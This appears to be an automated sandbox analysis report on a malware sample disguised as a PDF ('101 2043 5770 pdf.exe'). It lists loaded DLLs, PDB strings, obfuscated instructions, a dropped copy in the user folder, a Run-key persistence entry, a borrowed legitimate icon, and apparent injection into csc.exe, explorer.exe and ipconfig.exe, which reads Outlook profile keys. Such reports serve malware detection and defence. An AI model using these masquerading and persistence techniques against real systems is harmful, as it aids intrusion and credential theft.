Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: version.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: wldp.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: profapi.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: icu.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: propsys.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: edputil.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: urlmon.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: iertutil.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: srvcli.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: netutils.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: wintypes.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: appresolver.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: slc.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: userenv.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: sppc.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\101 2043 5770 pdf.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe

File written: C:\Users\user\AppData\Roaming\J8AR3449\J8Alogri.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 101 2043 5770 pdf.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 101 2043 5770 pdf.exe

Static file information: File size 2148960 > 1048576

Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 101 2043 5770 pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 101 2043 5770 pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ipconfig.pdb source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdb source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RAServer.pdb source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RAServer.pdbGCTL source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: firefox.pdb source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: csc.pdb source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: csc.pdbF source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp

Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Compiles C# or VB.Net code

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

PE file contains sections with non-standard names

Source: 101 2043 5770 pdf.exe	Static PE information: section name: .managed
Source: 101 2043 5770 pdf.exe	Static PE information: section name: hydrated
Source: 101 2043 5770 pdf.exe.0.dr	Static PE information: section name: .managed
Source: 101 2043 5770 pdf.exe.0.dr	Static PE information: section name: hydrated

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7872177 push rbx; iretd	0_2_00007FF7D787217A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00417948 push esi; retf	6_2_00417954
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D4E2 push eax; ret	6_2_0041D4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D4EB push eax; ret	6_2_0041D552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D495 push eax; ret	6_2_0041D4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D54C push eax; ret	6_2_0041D552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041665C pushad ; iretd	6_2_0041665D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041C6E2 push edi; retf	6_2_0041C6EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0040C6B8 push FFFFFFA4h; ret	6_2_0040C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059609AD push ecx; mov dword ptr [esp], ecx	6_2_059609B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05890FB8 push eax; retf	6_2_05890FC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588E9B5 push esp; retn 0000h	6_2_0588EAE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588EB02 push esp; retn 0000h	6_2_0588EB03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588EB1E push esp; retn 0000h	6_2_0588EB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_101759B5 push esp; retn 0000h	7_2_10175AE7
Source: C:\Windows\explorer.exe	Code function: 7_2_10175B1E push esp; retn 0000h	7_2_10175B1F
Source: C:\Windows\explorer.exe	Code function: 7_2_10175B02 push esp; retn 0000h	7_2_10175B03
Source: C:\Windows\explorer.exe	Code function: 7_2_10177FB8 push eax; retf	7_2_10177FC7
Source: C:\Windows\explorer.exe	Code function: 7_2_106EF9B5 push esp; retn 0000h	7_2_106EFAE7
Source: C:\Windows\explorer.exe	Code function: 7_2_106EFB02 push esp; retn 0000h	7_2_106EFB03
Source: C:\Windows\explorer.exe	Code function: 7_2_106EFB1E push esp; retn 0000h	7_2_106EFB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_106F1FB8 push eax; retf	7_2_106F1FC7
Source: C:\Windows\explorer.exe	Code function: 7_2_1124FB02 push esp; retn 0000h	7_2_1124FB03
Source: C:\Windows\explorer.exe	Code function: 7_2_1124FB1E push esp; retn 0000h	7_2_1124FB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_1124F9B5 push esp; retn 0000h	7_2_1124FAE7
Source: C:\Windows\explorer.exe	Code function: 7_2_11251FB8 push eax; retf	7_2_11251FC7
Source: C:\Windows\explorer.exe	Code function: 7_2_112F19B5 push esp; retn 0000h	7_2_112F1AE7
Source: C:\Windows\explorer.exe	Code function: 7_2_112F1B02 push esp; retn 0000h	7_2_112F1B03
Source: C:\Windows\explorer.exe	Code function: 7_2_112F1B1E push esp; retn 0000h	7_2_112F1B1F
Source: C:\Windows\explorer.exe	Code function: 7_2_112F3FB8 push eax; retf	7_2_112F3FC7
Source: C:\Windows\explorer.exe	Code function: 7_2_114519B5 push esp; retn 0000h	7_2_11451AE7

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"

Drops PE files

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File created: C:\Users\user\101 2043 5770 pdf.exe

Jump to dropped file

Drops PE files to the user directory

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File created: C:\Users\user\101 2043 5770 pdf.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File created: C:\Users\user\101 2043 5770 pdf.exe

Jump to dropped file

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 101 2043 5770 pdf			Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 101 2043 5770 pdf			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon306.png

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
